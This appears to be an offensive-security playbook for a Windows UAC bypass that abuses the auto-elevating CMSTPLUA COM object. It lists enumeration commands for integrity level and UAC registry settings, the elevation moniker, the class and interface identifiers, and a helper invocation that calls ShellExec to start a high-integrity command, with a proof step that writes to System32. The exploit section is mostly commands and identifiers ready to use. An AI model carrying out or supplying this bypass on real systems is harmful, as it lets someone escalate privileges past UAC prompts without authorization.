Some COM objects are approved for automatic elevation when called by a filtered local administrator.
This is a filtered admin to elevated admin primitive. It does not help a normal standard user unless that user can first become a local administrator.
The important registry location is:
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\UAC\COMAutoApprovalList
One commonly abused class is CMSTPLUA:
{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
The operator requests the object through the COM elevation moniker and calls ICMLuaUtil::ShellExec to start a high-integrity process.
When enumerating COM auto-elevation opportunities, try to identify:
- Current user is a local administrator
- Current shell is medium integrity
- UAC is enabled
- UAC is not set to always notify
- Target CLSID appears under
COMAutoApprovalList - Target class exposes a useful elevated method
- Session can interact with elevated desktop behavior
Enumeration
Check identity and integrity:
whoami /groups | findstr /i "Administrators"
whoami /groups | findstr /i "Mandatory"
Check UAC settings:
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v PromptOnSecureDesktop
Enumerate auto-approved COM classes:
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\UAC\COMAutoApprovalList"
Check the CMSTPLUA class:
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\UAC\COMAutoApprovalList" /v "{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"
reg query "HKCR\CLSID\{3E5FC7F9-9A51-4367-9063-A120244FBEC7}\Elevation"
reg query "HKCR\CLSID\{3E5FC7F9-9A51-4367-9063-A120244FBEC7}\LocalServer32"
Interesting findings include:
- User is a local administrator
- Integrity level is
Medium Mandatory Level ConsentPromptBehaviorAdminis0x5CMSTPLUAis auto-approvedElevation\Enabledis set to0x1
Once these conditions line up, test with a harmless proof command before running payloads.
Exploit
- Compile or stage a helper that calls
CoGetObjectwith this moniker:
Elevation:Administrator!new:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
- Request the
ICMLuaUtilinterface:
{6EDD6D74-C007-4E75-B76A-E5740995E24C}
- Call
ShellExecwith a controlled command:
CmstpluaBypass.exe "C:\Windows\System32\cmd.exe" "/c whoami /groups > C:\Windows\System32\ootw-uac-com.txt"
- Verify high-integrity execution:
type C:\Windows\System32\ootw-uac-com.txt
Expected finding:
High Mandatory Level
COM-based UAC bypasses depend heavily on:
- Windows build
- UAC settings
- COM object behavior
- Current integrity level
- Whether the session can interact with elevation mechanisms
ConsentPromptBehaviorAdmin is especially important.
If Windows requires a prompt, the bypass is failing.